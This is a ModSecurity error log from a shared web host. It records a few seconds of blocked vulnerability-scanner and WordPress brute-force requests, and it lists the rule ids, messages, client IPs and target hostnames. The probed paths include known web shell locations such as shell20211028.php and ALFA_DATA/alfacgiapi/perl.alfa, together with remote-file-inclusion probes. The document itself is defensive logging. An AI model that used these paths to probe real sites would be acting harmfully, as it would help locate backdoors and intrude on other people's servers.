[Tue May 26 16:35:24.166480 2026] [security2:error] [pid 808625:tid 808816] [client 130.131.224.225:64571] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/la.php"] [unique_id "ahV-dDEl_SBaWibfDmpi0AAAAD0"]
[Tue May 26 16:35:24.173113 2026] [security2:error] [pid 808625:tid 808822] [client 20.151.117.104:54386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/file/chosen.php"] [unique_id "ahV-dDEl_SBaWibfDmpi0QAAAEM"]
[Tue May 26 16:35:24.173226 2026] [security2:error] [pid 808625:tid 808822] [client 20.151.117.104:54386] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/file/chosen.php"] [unique_id "ahV-dDEl_SBaWibfDmpi0QAAAEM"]
[Tue May 26 16:35:24.321800 2026] [security2:error] [pid 808625:tid 808802] [client 20.151.117.104:31168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/chosen/chosen.php"] [unique_id "ahV-dDEl_SBaWibfDmpi1gAAAC8"]
[Tue May 26 16:35:24.321895 2026] [security2:error] [pid 808625:tid 808802] [client 20.151.117.104:31168] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/chosen/chosen.php"] [unique_id "ahV-dDEl_SBaWibfDmpi1gAAAC8"]
[Tue May 26 16:35:24.361663 2026] [security2:error] [pid 808625:tid 808848] [client 130.131.224.225:60135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/first.php"] [unique_id "ahV-dDEl_SBaWibfDmpi1wAAAF0"]
[Tue May 26 16:35:24.361774 2026] [security2:error] [pid 808625:tid 808848] [client 130.131.224.225:60135] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/first.php"] [unique_id "ahV-dDEl_SBaWibfDmpi1wAAAF0"]
[Tue May 26 16:35:24.466446 2026] [security2:error] [pid 808625:tid 808781] [client 20.151.117.104:8401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/css/chosen.php"] [unique_id "ahV-dDEl_SBaWibfDmpi2AAAABo"]
[Tue May 26 16:35:24.466596 2026] [security2:error] [pid 808625:tid 808781] [client 20.151.117.104:8401] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/css/chosen.php"] [unique_id "ahV-dDEl_SBaWibfDmpi2AAAABo"]
[Tue May 26 16:35:24.556265 2026] [security2:error] [pid 808625:tid 808760] [client 130.131.224.225:62660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/pass4.php"] [unique_id "ahV-dDEl_SBaWibfDmpi3wAAAAU"]
[Tue May 26 16:35:24.556352 2026] [security2:error] [pid 808625:tid 808760] [client 130.131.224.225:62660] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/pass4.php"] [unique_id "ahV-dDEl_SBaWibfDmpi3wAAAAU"]
[Tue May 26 16:35:24.612837 2026] [security2:error] [pid 808625:tid 808830] [client 20.151.117.104:22300] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ALFA_DATA/alfacgiapi/perl.alfa"] [unique_id "ahV-dDEl_SBaWibfDmpi4wAAAEs"]
[Tue May 26 16:35:24.654474 2026] [security2:error] [pid 808625:tid 808726] [remote 47.251.53.97:58744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahV-dDEl_SBaWibfDmpi2QAASmQ"]
[Tue May 26 16:35:24.685523 2026] [security2:error] [pid 808625:tid 808759] [client 130.131.224.225:63971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-firewall.php"] [unique_id "ahV-dDEl_SBaWibfDmpi5AAAAAQ"]
[Tue May 26 16:35:24.685631 2026] [security2:error] [pid 808625:tid 808759] [client 130.131.224.225:63971] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-firewall.php"] [unique_id "ahV-dDEl_SBaWibfDmpi5AAAAAQ"]
[Tue May 26 16:35:24.812670 2026] [security2:error] [pid 808625:tid 808839] [client 130.131.224.225:65134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/lv.php"] [unique_id "ahV-dDEl_SBaWibfDmpi5QAAAFQ"]
[Tue May 26 16:35:24.812768 2026] [security2:error] [pid 808625:tid 808839] [client 130.131.224.225:65134] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/lv.php"] [unique_id "ahV-dDEl_SBaWibfDmpi5QAAAFQ"]
[Tue May 26 16:35:24.833455 2026] [security2:error] [pid 808625:tid 808857] [client 20.151.117.104:8201] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahV-dDEl_SBaWibfDmpi5gAAAGY"]
[Tue May 26 16:35:24.906771 2026] [security2:error] [pid 808625:tid 808865] [client 20.151.117.104:22300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/date.php"] [unique_id "ahV-dDEl_SBaWibfDmpi5wAAAG4"]
[Tue May 26 16:35:24.906898 2026] [security2:error] [pid 808625:tid 808865] [client 20.151.117.104:22300] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/date.php"] [unique_id "ahV-dDEl_SBaWibfDmpi5wAAAG4"]
[Tue May 26 16:35:24.973258 2026] [security2:error] [pid 808625:tid 808854] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-dDEl_SBaWibfDmpizwAAAGM"]
[Tue May 26 16:35:25.002737 2026] [security2:error] [pid 808625:tid 808867] [client 130.131.224.225:64610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/yas.php"] [unique_id "ahV-dTEl_SBaWibfDmpi7QAAAHA"]
[Tue May 26 16:35:25.002859 2026] [security2:error] [pid 808625:tid 808867] [client 130.131.224.225:64610] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/yas.php"] [unique_id "ahV-dTEl_SBaWibfDmpi7QAAAHA"]
[Tue May 26 16:35:25.057095 2026] [security2:error] [pid 808625:tid 808832] [client 20.151.117.104:27025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/pomo.php"] [unique_id "ahV-dTEl_SBaWibfDmpi7gAAAE0"]
[Tue May 26 16:35:25.057199 2026] [security2:error] [pid 808625:tid 808832] [client 20.151.117.104:27025] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/pomo.php"] [unique_id "ahV-dTEl_SBaWibfDmpi7gAAAE0"]
[Tue May 26 16:35:25.198933 2026] [security2:error] [pid 808625:tid 808874] [client 130.131.224.225:63236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-trackback.php"] [unique_id "ahV-dTEl_SBaWibfDmpi8QAAAHc"]
[Tue May 26 16:35:25.199041 2026] [security2:error] [pid 808625:tid 808874] [client 130.131.224.225:63236] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-trackback.php"] [unique_id "ahV-dTEl_SBaWibfDmpi8QAAAHc"]
[Tue May 26 16:35:25.200817 2026] [security2:error] [pid 808625:tid 808775] [client 20.151.117.104:8426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahV-dTEl_SBaWibfDmpi8gAAABQ"]
[Tue May 26 16:35:25.200885 2026] [security2:error] [pid 808625:tid 808775] [client 20.151.117.104:8426] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahV-dTEl_SBaWibfDmpi8gAAABQ"]
[Tue May 26 16:35:25.352691 2026] [security2:error] [pid 808625:tid 808820] [client 20.151.117.104:22282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/t/rfi.php"] [unique_id "ahV-dTEl_SBaWibfDmpi8wAAAEE"]
[Tue May 26 16:35:25.352787 2026] [security2:error] [pid 808625:tid 808820] [client 20.151.117.104:22282] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/t/rfi.php"] [unique_id "ahV-dTEl_SBaWibfDmpi8wAAAEE"]
[Tue May 26 16:35:25.357322 2026] [security2:error] [pid 808625:tid 808844] [client 130.131.224.225:60727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/png.php"] [unique_id "ahV-dTEl_SBaWibfDmpi9AAAAFk"]
[Tue May 26 16:35:25.357436 2026] [security2:error] [pid 808625:tid 808844] [client 130.131.224.225:60727] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/png.php"] [unique_id "ahV-dTEl_SBaWibfDmpi9AAAAFk"]
[Tue May 26 16:35:25.516280 2026] [security2:error] [pid 808625:tid 808780] [client 117.198.37.168:58892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-dTEl_SBaWibfDmpi9QAAABk"]
[Tue May 26 16:35:25.516415 2026] [security2:error] [pid 808625:tid 808780] [client 117.198.37.168:58892] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-dTEl_SBaWibfDmpi9QAAABk"]
[Tue May 26 16:35:25.596937 2026] [security2:error] [pid 808625:tid 808782] [client 20.151.117.104:21046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/sendmail.php"] [unique_id "ahV-dTEl_SBaWibfDmpi_AAAABs"]
[Tue May 26 16:35:25.597054 2026] [security2:error] [pid 808625:tid 808782] [client 20.151.117.104:21046] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/sendmail.php"] [unique_id "ahV-dTEl_SBaWibfDmpi_AAAABs"]
[Tue May 26 16:35:25.758263 2026] [security2:error] [pid 808625:tid 808802] [client 130.131.224.225:63884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-at.php"] [unique_id "ahV-dTEl_SBaWibfDmpjBAAAAC8"]
[Tue May 26 16:35:25.758400 2026] [security2:error] [pid 808625:tid 808802] [client 130.131.224.225:63884] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-at.php"] [unique_id "ahV-dTEl_SBaWibfDmpjBAAAAC8"]
[Tue May 26 16:35:26.502083 2026] [security2:error] [pid 808625:tid 808760] [client 130.131.224.225:64637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/database.php"] [unique_id "ahV-djEl_SBaWibfDmpjFAAAAAU"]
[Tue May 26 16:35:26.502224 2026] [security2:error] [pid 808625:tid 808760] [client 130.131.224.225:64637] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/database.php"] [unique_id "ahV-djEl_SBaWibfDmpjFAAAAAU"]
[Tue May 26 16:35:26.742482 2026] [security2:error] [pid 808625:tid 808794] [client 130.131.224.225:65067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahV-djEl_SBaWibfDmpjGAAAACc"]
[Tue May 26 16:35:26.742616 2026] [security2:error] [pid 808625:tid 808794] [client 130.131.224.225:65067] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahV-djEl_SBaWibfDmpjGAAAACc"]
[Tue May 26 16:35:27.033391 2026] [security2:error] [pid 808625:tid 808767] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-djEl_SBaWibfDmpjDwAAAAw"]
[Tue May 26 16:35:27.165807 2026] [security2:error] [pid 808625:tid 808832] [client 130.131.224.225:65091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahV-dzEl_SBaWibfDmpjIAAAAE0"]
[Tue May 26 16:35:27.165909 2026] [security2:error] [pid 808625:tid 808832] [client 130.131.224.225:65091] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahV-dzEl_SBaWibfDmpjIAAAAE0"]
[Tue May 26 16:35:27.472084 2026] [security2:error] [pid 808625:tid 808874] [client 130.131.224.225:63357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/new.php"] [unique_id "ahV-dzEl_SBaWibfDmpjJwAAAHc"]
[Tue May 26 16:35:27.472196 2026] [security2:error] [pid 808625:tid 808874] [client 130.131.224.225:63357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/new.php"] [unique_id "ahV-dzEl_SBaWibfDmpjJwAAAHc"]
[Tue May 26 16:35:27.629952 2026] [security2:error] [pid 808625:tid 808768] [client 142.147.108.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-dzEl_SBaWibfDmpjKgAAAA0"], referer: https://www.anujtradingco.com/
[Tue May 26 16:35:27.669729 2026] [security2:error] [pid 808625:tid 808828] [client 130.131.224.225:62666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahV-dzEl_SBaWibfDmpjKwAAAEk"]
[Tue May 26 16:35:27.669823 2026] [security2:error] [pid 808625:tid 808828] [client 130.131.224.225:62666] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahV-dzEl_SBaWibfDmpjKwAAAEk"]
[Tue May 26 16:35:27.954324 2026] [security2:error] [pid 808625:tid 808878] [client 130.131.224.225:63909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/txets.php"] [unique_id "ahV-dzEl_SBaWibfDmpjLwAAAHs"]
[Tue May 26 16:35:27.954451 2026] [security2:error] [pid 808625:tid 808878] [client 130.131.224.225:63909] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/txets.php"] [unique_id "ahV-dzEl_SBaWibfDmpjLwAAAHs"]
[Tue May 26 16:35:28.164977 2026] [security2:error] [pid 808625:tid 808780] [client 130.131.224.225:65060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/shell20211028.php"] [unique_id "ahV-eDEl_SBaWibfDmpjMwAAABk"]
[Tue May 26 16:35:28.165083 2026] [security2:error] [pid 808625:tid 808780] [client 130.131.224.225:65060] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/shell20211028.php"] [unique_id "ahV-eDEl_SBaWibfDmpjMwAAABk"]
[Tue May 26 16:35:28.584871 2026] [security2:error] [pid 808625:tid 808836] [client 130.131.224.225:61961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-wz.php"] [unique_id "ahV-eDEl_SBaWibfDmpjPQAAAFE"]
[Tue May 26 16:35:28.584958 2026] [security2:error] [pid 808625:tid 808836] [client 130.131.224.225:61961] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-wz.php"] [unique_id "ahV-eDEl_SBaWibfDmpjPQAAAFE"]
[Tue May 26 16:35:28.816866 2026] [security2:error] [pid 808625:tid 808818] [client 142.147.108.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-eDEl_SBaWibfDmpjQwAAAD8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1264994&moderation-hash=c8d897cb135281ef76835ec35ac96745
[Tue May 26 16:35:29.321854 2026] [security2:error] [pid 808625:tid 808833] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-eDEl_SBaWibfDmpjQAAAAE4"]
[Tue May 26 16:35:29.633669 2026] [security2:error] [pid 808625:tid 808772] [client 130.131.224.225:63347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/albin.php"] [unique_id "ahV-eTEl_SBaWibfDmpjVQAAABE"]
[Tue May 26 16:35:29.633764 2026] [security2:error] [pid 808625:tid 808772] [client 130.131.224.225:63347] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/albin.php"] [unique_id "ahV-eTEl_SBaWibfDmpjVQAAABE"]
[Tue May 26 16:35:29.744779 2026] [fcgid:warn] [pid 808625:tid 808784] (70014)End of file found: [client 64.62.197.62:52026] mod_fcgid: can't get data from http client
